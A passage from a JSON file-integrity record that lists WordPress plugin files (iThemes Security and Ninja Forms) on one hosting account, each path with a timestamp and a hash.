ter-wp-security\\/core\\/files.php\":{\"d\":1535620875,\"h\":\"60f42e4d06f58cc955c7a71361b83cb2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/show-multiple-version-notice.php\":{\"d\":1535620875,\"h\":\"614ae85a21ef48d51dee055c1cc2d726\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/core.php\":{\"d\":1535620875,\"h\":\"52e9f68453c20362035c5d28d5c6722c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/core\\/sidebar-widget-active-lockouts.php\":{\"d\":1535620875,\"h\":\"bb7175d125317a4fbfb0602c1eb58c61\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/fonts\\/ithemes-icons.eot\":{\"d\":1535620875,\"h\":\"806a53b830f29c4e1a92398a5233dbce\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/fonts\\/ithemes-icons.ttf\":{\"d\":1535620875,\"h\":\"3638c3971bed7ade6547754a896668e8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/fonts\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/fonts\\/ithemes-icons.woff\":{\"d\":1535620875,\"h\":\"1849448daea1ad4ba5d53cc439b2e773\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/load.php\":{\"d\":1535620875,\"h\":\"7a36ea8313f8bdbd123c037f75b0e3e6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/icon-fonts.css\":{\"d\":1535620875,\"h\":\"07a63c161dc5e944dd1450699dd47ebb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/history.txt\":{\"d\":1535620875,\"h\":\"a1314384f4d9242b5ffef5a365473efa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/index.php\":{\"d\":1535620875,\"h\":\"edd44fb57046348bb90a9bca014b6b4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/icon-fonts\\/init.php\":{\"d\":1535620875,\"h\":\"daf9ccc98e1dd336debfd9523d34f9ce\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/lib\\/index.php\":{\"d\":1535620875,\"h\":\"56d4439768678cd301f9a9f140f9440b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/readme.txt\":{\"d\":1535620875,\"h\":\"263303dd44e2d29947b0af71855a715d\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/history.txt\":{\"d\":1535620875,\"h\":\"fd931db1a83052bf0a65f718f02d13a7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/better-wp-security.php\":{\"d\":1535620875,\"h\":\"133ffcbe72665d6e314887330c54b9d7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/better-wp-security\\/index.php\":{\"d\":1535620875,\"h\":\"56d4439768678cd301f9a9f140f9440b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/index.php\":{\"d\":1239825424,\"h\":\"96137494913a1f730a592e8932af394e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/services\\/bootstrap.php\":{\"d\":1535620878,\"h\":\"23a1903cfa36cfd5d3325011703261ec\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/services\\/oauth.php\":{\"d\":1535620878,\"h\":\"1cfd5e2c1a1014ffc355a93f780ddb66\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/services\\/README.md\":{\"d\":1535620878,\"h\":\"7d0b41ddf196b7b32c189769445739f3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/services\\/remote-installer-skin.php\":{\"d\":1535620878,\"h\":\"ef35e494ebd0f07025d9efce0814cddd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/min\\/front-end--helptext.min.js\":{\"d\":1535620878,\"h\":\"b8b8cf824ca52be7b779f607030652dd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/min\\/front-end--datepicker.min.js\":{\"d\":1535620878,\"h\":\"e733d7a3cfa7b1994f63706a46e463f8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/min\\/front-end--autonumeric.min.js\":{\"d\":1535620878,\"h\":\"f7e5e89e8d71a3308192a62f3ffaa227\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/min\\/front-end-deps.js\":{\"d\":1535620878,\"h\":\"ae39016af51ae7d189bc99f8bcd0a715\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/min\\/front-end--inputmask.min.js\":{\"d\":1535620878,\"h\":\"fe9167653c9bf483a9124d8cdd891985\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/min\\/global.js\":{\"d\":1535620878,\"h\":\"9798ab39d1d1aa9706cae0ab30f69969\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/min\\/builder.js\":{\"d\":1535620878,\"h\":\"62e04c99b92cbf9b028e76b51f235789\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/min\\/front-end--rte.min.js\":{\"d\":1535620878,\"h\":\"cf5bb2f0fedaf672b82b9d780e9bc0cb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/min\\/block.js\":{\"d\":1535620878,\"h\":\"7aab70979e146973d434c0bcc1438684\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/min\\/dashboard.min.js.map\":{\"d\":1535620878,\"h\":\"f342f5903702958de80925890694cc5c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/min\\/front-end.js\":{\"d\":1535620878,\"h\":\"1e2be9fc6a67650fd5945ede0b328c9f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/min\\/front-end.js.map\":{\"d\":1535620878,\"h\":\"428aa46a8f448dba46bc7cd6c607365e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/min\\/front-end-bundle.js\":{\"d\":1535620878,\"h\":\"7aaa87dfc9a6064a075eb57bb33eb6bc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/min\\/front-end--starrating.min.js\":{\"d\":1535620878,\"h\":\"64847ca7c696411de55f4275fd278754\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/min\\/builder.js.map\":{\"d\":1535620878,\"h\":\"2f611399887d07752f8f2c49dedf9678\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/min\\/dashboard.min.js\":{\"d\":1535620878,\"h\":\"c34acbeca32a875c2dd1eeba5e03e4ed\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/backbone.radio.min.js\":{\"d\":1535620878,\"h\":\"527d23ddde60c4b0c64f73125d7e5064\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/jBox.min.js\":{\"d\":1535620878,\"h\":\"b8b8cf824ca52be7b779f607030652dd\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/jquery.maskedinput.min.js\":{\"d\":1535620878,\"h\":\"fe9167653c9bf483a9124d8cdd891985\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/codemirror-xml.min.js\":{\"d\":1535620878,\"h\":\"9d6063d17a66fe14833885aa8f7530a4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/backbone.marionette3.min.js\":{\"d\":1535620878,\"h\":\"299539b1c7eb55d235d02e741f199440\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/codemirror-formatting.min.js\":{\"d\":1535620878,\"h\":\"891578c05f5273b834acf1b6851d3a60\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/summernote.min.js\":{\"d\":1535620878,\"h\":\"706a00e5f0b5ca3b93d415ea71bf72d8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/rating.min.js\":{\"d\":1535620878,\"h\":\"64847ca7c696411de55f4275fd278754\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/jquery.ui.touch-punch.min.js\":{\"d\":1535620878,\"h\":\"13ff3cff544791aa25f7098469c69ec0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/pikaday-responsive.js\":{\"d\":1535620878,\"h\":\"cb854b6412d0a8918bb2b5791a07e656\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/jquery.classywiggle.min.js\":{\"d\":1535620878,\"h\":\"2fd2904e6999ab3eb931b2d7418608ca\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/almond.js\":{\"d\":1535620878,\"h\":\"aa66c0c0cb55a4627bb706df73f3aff5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/bootstrap.min.js\":{\"d\":1535620878,\"h\":\"b7f4319ad4ebf1dcd0a144419ea83c01\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/jquery.ui.touch-punch.js\":{\"d\":1535620878,\"h\":\"72a858b93c92f91782e783e1b49ea2ff\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/pikaday.min.js\":{\"d\":1535620878,\"h\":\"b2213d2bbbcf8fcfe0ef0047e6b21564\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/jquery.caret.min.js\":{\"d\":1535620878,\"h\":\"044b0cc96fdc65b07f2c69916466bce5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/jquery.autoNumeric.min.js\":{\"d\":1535620878,\"h\":\"64d0c813467e4e2c2ab662784f7965d2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/ninjaModal.js\":{\"d\":1535620878,\"h\":\"5b7c9fe2d1e4bd9dffffde1faacd5ceb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/moment-with-locales.min.js\":{\"d\":1535620878,\"h\":\"f291749a29d0e1c5d4d7ccc8e404dea1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/jquery.hotkeys.min.js\":{\"d\":1535620878,\"h\":\"9d9fc2ec63df544c5fc54f108381eed5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/speakingurl.js\":{\"d\":1535620878,\"h\":\"5a1d51d8cb52a0f9d432434301ae7933\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/math-expression-evaluator.min.js\":{\"d\":1535620878,\"h\":\"af2ad035c85f8f8c4f890d88d02bd829\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/slugify.min.js\":{\"d\":1535620878,\"h\":\"652829551025bc8e4b64f7c54053271a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/combobox.min.js\":{\"d\":1535620878,\"h\":\"44a07deca8ad9ca364bcc69da939cabb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/pikaday-responsive.min.js\":{\"d\":1535620878,\"h\":\"d395cd8b11ecd0cddaa903b91ab0da1f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/summernote.js\":{\"d\":1535620878,\"h\":\"7bbe8b3b2dc7dcdeea5542a32505cdf9\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/codemirror.min.js\":{\"d\":1535620878,\"h\":\"4b4d2ee6598066ebfcbbe2503a632d2f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/perfect-scrollbar.jquery.min.js\":{\"d\":1535620878,\"h\":\"b4e42d596127ea16f0150021ddf74901\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/jquery.mobile-events.min.js\":{\"d\":1535620878,\"h\":\"59a66c5f69924afc46b35b46c89590f5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/lib\\/backbone.marionette.min.js\":{\"d\":1535620878,\"h\":\"ceefdb55cd1268a7f872ac6fc1673e2f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/all-forms.js\":{\"d\":1535620878,\"h\":\"707b95682b1098d7729de23213c456c6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/admin-settings.js\":{\"d\":1535620878,\"h\":\"fe18dcf5b8c0a595918233462737eac5\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/admin-submissions.js\":{\"d\":1535620878,\"h\":\"1552938e811f938ac1bd1c744f2cfb7f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/backbone.js\":{\"d\":1535620878,\"h\":\"de53fe50a32803489ab1a0bbf760e8f6\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/admin-import-export.js\":{\"d\":1535620878,\"h\":\"414e808b73471d1fdae9b2f4fe74e52e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/admin-system-status.js\":{\"d\":1535620878,\"h\":\"9a163034e3453ef0d57c3fd86c109c4f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/js\\/underscore.js\":{\"d\":1535620878,\"h\":\"2bb517685ae640af671d438d5a25a098\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/fonts\\/fontawesome-webfont.ttf\":{\"d\":1535620878,\"h\":\"a3de2170e4e9df77161ea5d3f31b2668\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/fonts\\/FontAwesome.otf\":{\"d\":1535620878,\"h\":\"87d8ca3ddc57e7d2da6226e480f90457\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/fonts\\/fontawesome-webfont.woff2\":{\"d\":1535620878,\"h\":\"db812d8a70a4e88e888744c1c9a27e89\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/fonts\\/fontawesome-webfont.woff\":{\"d\":1535620878,\"h\":\"a35720c2fed2c7f043bc7e4ffb45e073\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/fonts\\/fontawesome-webfont.eot\":{\"d\":1535620878,\"h\":\"32400f4e08932a94d8bfd2422702c446\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/TooltipBorder.css\":{\"d\":1535620878,\"h\":\"2c5b935059cf3efbde78f17abc94ba21\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/builder.css\":{\"d\":1535620878,\"h\":\"c84e5f766a497b5b8553a70f5c252d76\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/admin-addons.css\":{\"d\":1535620878,\"h\":\"4331a02cd3ddce063c640f3c5a79e9f0\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/dashboard.min.css.map\":{\"d\":1535620878,\"h\":\"4a6f70b1d7df26124b7203b472e53fb1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/display-structure.css\":{\"d\":1535620878,\"h\":\"c293bbeea4905bb33ab1a5ca52179e4c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/pikaday-package.css\":{\"d\":1535620878,\"h\":\"6d518fb57441f90658ac0101e4ddd1b8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/builder.css.map\":{\"d\":1535620878,\"h\":\"4b8f6a426c680fc06c5e917f63b185b1\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/admin-notices.css\":{\"d\":1535620878,\"h\":\"2f123d6380c3a1c987b0eb1de0b7facc\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/combobox.css\":{\"d\":1535620878,\"h\":\"65d41375c678d0bf2b4094aad40287c2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/admin-settings.css\":{\"d\":1535620878,\"h\":\"1b4233f97baff6c7aa3fb86c5a6cd2ea\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/display-opinions-light.css\":{\"d\":1535620878,\"h\":\"a21689a39a1cc4dbd47fb3d24b7dc255\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/display-structure.css.map\":{\"d\":1535620878,\"h\":\"c5c7c49ed144b051795f7c9bf3d4aa2e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/display-opinions-light.css.map\":{\"d\":1535620878,\"h\":\"84a5baa4d4048a14d671e38bc33a7753\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/nf-form-block-editor.css\":{\"d\":1535620878,\"h\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/dashboard.min.css\":{\"d\":1535620878,\"h\":\"2e8693ac1d6dfe723dc0f0d626ea7230\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/summernote.css\":{\"d\":1535620878,\"h\":\"d1615c1bf16e81ca2bb2cfd28450a7f4\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/NoticeBorder.css\":{\"d\":1535620878,\"h\":\"20a5d3ce3282ecd35e7b35d5956331de\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/display-opinions.css\":{\"d\":1535620878,\"h\":\"d12fa51ffbda67745eef0dec2479aeae\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/font-awesome.min.css\":{\"d\":1535620878,\"h\":\"4fbd15cb6047af93373f4f895639c8bf\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/display-opinions.css.map\":{\"d\":1535620878,\"h\":\"3bede1b5c42216e6e91115a4c2592c9c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/bootstrap.css\":{\"d\":1535620878,\"h\":\"e2cd280043ecb1961782b93ab8e35910\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/monokai-theme.css\":{\"d\":1535620878,\"h\":\"a778e3a734f4a088f3773acf73d6cf5e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/display-opinions-dark.css.map\":{\"d\":1535620878,\"h\":\"3a2cac999e5412ed1e4660f0731b3e61\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/codemirror.css\":{\"d\":1535620878,\"h\":\"94c84e73bd59b5214d84bcc61a40e10e\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/nf-form-block-style.css\":{\"d\":1535620878,\"h\":\"74c8d8cc919352bba2f46b7c78c5776b\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/jBox.css\":{\"d\":1535620878,\"h\":\"40cd3560b9067b086e5b9988810290ab\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/rating.css\":{\"d\":1535620878,\"h\":\"ec3c6782be846dde7698763665c4b8aa\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/display-opinions-dark.css\":{\"d\":1535620878,\"h\":\"93ef87bde65b8572cfe40a7a7121e213\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/css\\/admin-system-status.css\":{\"d\":1535620878,\"h\":\"afda0217bb72c52dc101eac411f36b15\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/ListModifier.php\":{\"d\":1535620877,\"h\":\"88468fd796dce258178837755bf88a81\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/CreditCard.php\":{\"d\":1535620877,\"h\":\"54864ce0536c285addc87b72d4d4f006\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/CreditCardCVC.php\":{\"d\":1535620877,\"h\":\"6c382074a607770910487e739e89fb2f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/LastName.php\":{\"d\":1535620877,\"h\":\"579c28019a4c76bf5bf6874020ca2537\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/City.php\":{\"d\":1535620877,\"h\":\"10aeed25b6ff676a9763268fc83bf61f\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/Checkbox.php\":{\"d\":1535620877,\"h\":\"2fd026bc9651cdf7536adafb60d2135a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/Quantity.php\":{\"d\":1535620877,\"h\":\"208ce4d3be8262d6b99289ecc9852640\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/Password.php\":{\"d\":1535620877,\"h\":\"e97521bcd0cbd410b4c7562f53952f75\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/FirstName.php\":{\"d\":1535620877,\"h\":\"d44088627d6885a55f4ab8539d4d66e7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/Textbox.php\":{\"d\":1535620877,\"h\":\"791ec985909e8d74c831f97f4619f1a3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/Terms.php\":{\"d\":1535620877,\"h\":\"837ac38cffa786bd97d251442a5dc8d8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/Confirm.php\":{\"d\":1535620877,\"h\":\"c2ee175c15ca7e8906529dd9ccf6a23c\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/Hidden.php\":{\"d\":1535620877,\"h\":\"c949033ca76529b5600bf6d5f313f2e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/Button.php\":{\"d\":1535620877,\"h\":\"de53d9ee28a68d2415968b0d1d2df297\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/Number.php\":{\"d\":1535620877,\"h\":\"44e0da13661ce3221aa2ecbab72698d3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/ListState.php\":{\"d\":1535620877,\"h\":\"1ec5a5b6c9a591b581d516817a8073c8\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/Address2.php\":{\"d\":1535620877,\"h\":\"0f155d29ce5c78f308fe37079b1beccb\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/hr.php\":{\"d\":1535620877,\"h\":\"7a013bfec1da3e59073b09067ca06ed3\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/Address.php\":{\"d\":1535620877,\"h\":\"ef31c499af92c0cb73ea965aa4242c10\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/ListCheckbox.php\":{\"d\":1535620877,\"h\":\"f5aa06fa5d687e6b4d3c72a5797cd2ce\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/Shipping.php\":{\"d\":1535620877,\"h\":\"70eabdcea7697b1534555567b77340ac\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/ListSelect.php\":{\"d\":1535620877,\"h\":\"3a1ca6b008b277fedc685690ba8cd855\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/Product.php\":{\"d\":1535620877,\"h\":\"f50ef2941e14af3b274301cef6ff70e2\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/CreditCardFullName.php\":{\"d\":1535620877,\"h\":\"5715c4114df339162958145f3d804660\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/Spam.php\":{\"d\":1535620877,\"h\":\"996465d38bb04bc9b79896ebec56666a\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/Email.php\":{\"d\":1535620877,\"h\":\"c31ca1508c70be3e7ab80446a35b7de7\"},\"\\/home2\\/zphiblgz\\/public_html\\/wp-content\\/plugins\\/ninja-forms\\/includes\\/Fields\\/Phone.php\":{\"d\":1535620877,\"h\":\"1d275a62c5675bb2e94cab95354c5427\"},\"